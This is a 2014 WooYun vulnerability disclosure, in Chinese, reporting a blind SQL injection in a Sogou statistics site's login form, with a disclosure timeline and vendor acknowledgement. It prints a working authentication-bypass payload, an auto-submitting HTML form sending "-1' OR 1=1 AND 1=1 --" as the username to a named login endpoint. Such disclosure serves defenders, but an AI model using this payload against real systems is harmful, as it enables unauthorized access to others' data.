[公开漏洞]搜狗某应用SQL注入漏洞可看他人系统数据 - 漏洞预警

搜狗某应用SQL注入漏洞可看他人系统数据相关厂商：搜狗漏洞作者：梧桐雨提交时间：2014-05-01 10:55 公开时间：2014-06-15 10:56 漏洞类型：SQL注射漏洞危害等级：高自评Rank：15 漏洞状态：厂商已经确认漏洞来源：http://www.wooyun.org Tags标签： sql注入盲注后台登录框注入漏洞详情披露状态：

2014-05-01：细节已通知厂商并且等待厂商处理中
2014-05-04：厂商已经确认，细节仅向厂商公开
2014-05-14：细节向核心白帽子及相关领域专家公开
2014-05-24：细节向普通白帽子公开
2014-06-03：细节向实习白帽子公开
2014-06-15：细节向公众公开

简要描述：

听说开了SGSRC啊。来wooyun支持下。

详细说明：

问题出在:

http://tongji.sogou.com/

登录表单username存在sql盲注入。

构造如下表单即可登录进后台：

<form action="http://tongji.sogou.com/login_login.action" method="post" name="wutongyu" id="wutongyu">

<input type="text" name="username" value="-1' OR 1=1 AND 1=1 --"/>

</form>

<script>

document.wutongyu.submit();

</script>

漏洞证明：

成功以sogou内部人员的身份登录平台：

修复方案：

过滤username字段。

危害等级：高

漏洞Rank：15

确认时间：2014-05-04 11:38

厂商回复：

收到，感谢支持，欢迎到SGSRC（http://）提交漏洞。